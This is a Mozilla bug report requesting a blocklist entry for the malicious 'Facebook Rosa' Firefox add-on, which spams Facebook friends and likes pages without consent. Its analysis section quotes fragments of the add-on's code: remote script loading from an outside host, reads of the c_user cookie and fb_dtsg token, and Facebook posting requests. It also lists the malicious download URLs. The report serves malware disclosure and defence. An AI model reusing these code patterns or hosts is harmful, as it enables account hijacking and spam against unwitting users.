Closed Bug 743484 Opened 13 years ago Closed 13 years ago

Malicious "Facebook Rosa" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Attachments

(1 file)

156.41 KB, application/octet-stream
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded add-on from http://rosathemenplus.com/plugin.xpi

Actual results:

Report for http://rosathemenplus.com/plugin.xpi

** Summary **
On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent.

** Embedded and Remote Files **
lib.js
http://temasuperplugin.info?'+Math.random()
icon48.png
icon16.png
icon128.png
manifest.json

** Embedded Metadata **

** Files Loaded **

** Remote Javascript Loaded **
...(a=(b=document).createElement('script')).src='http://temasuperplugin.info?'+Math...
"description": "Verwandeln Sie Ihr Facebook in rosa!",
"content_scripts": [

** Facebook Paths Accessed **
... F m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g \'...
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
"name": "Facebook: Rosa Themen-Plugin",
"description": "Verwandeln Sie Ihr Facebook in rosa!",

** Facebook Data Accessed **
var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo...
user_id = readCookie('c_user');

** HTTP Requests **
var c = new XMLHttpRequest();
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);

** All URLs Loaded or Mentioned **
...var blog = "http://rosaausgabepro.com/farbe/" + randomFromTo(8601,8800) + ".php"...
...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
...document).createElement('script')).src='http://temasuperplugin.info?'+Math.rando...
"update_url": "http://rosaplugin.info/chrome.xml",

Expected results:

It should not post Facebook messages or like pages without your knowledge or consent.
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Hi, can you ban this spammer add-on too?
http://faceeklenti.com/
http://faceeklenti.com/firefox.php
http://faceeklenti.com/eklenti/facebook.xpi
You may not access the website by having a Turkish IP address. You can try to access the site through http://www.gizlen.net/, a Turkish web-based proxy.
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
Product: addons.mozilla.org → Toolkit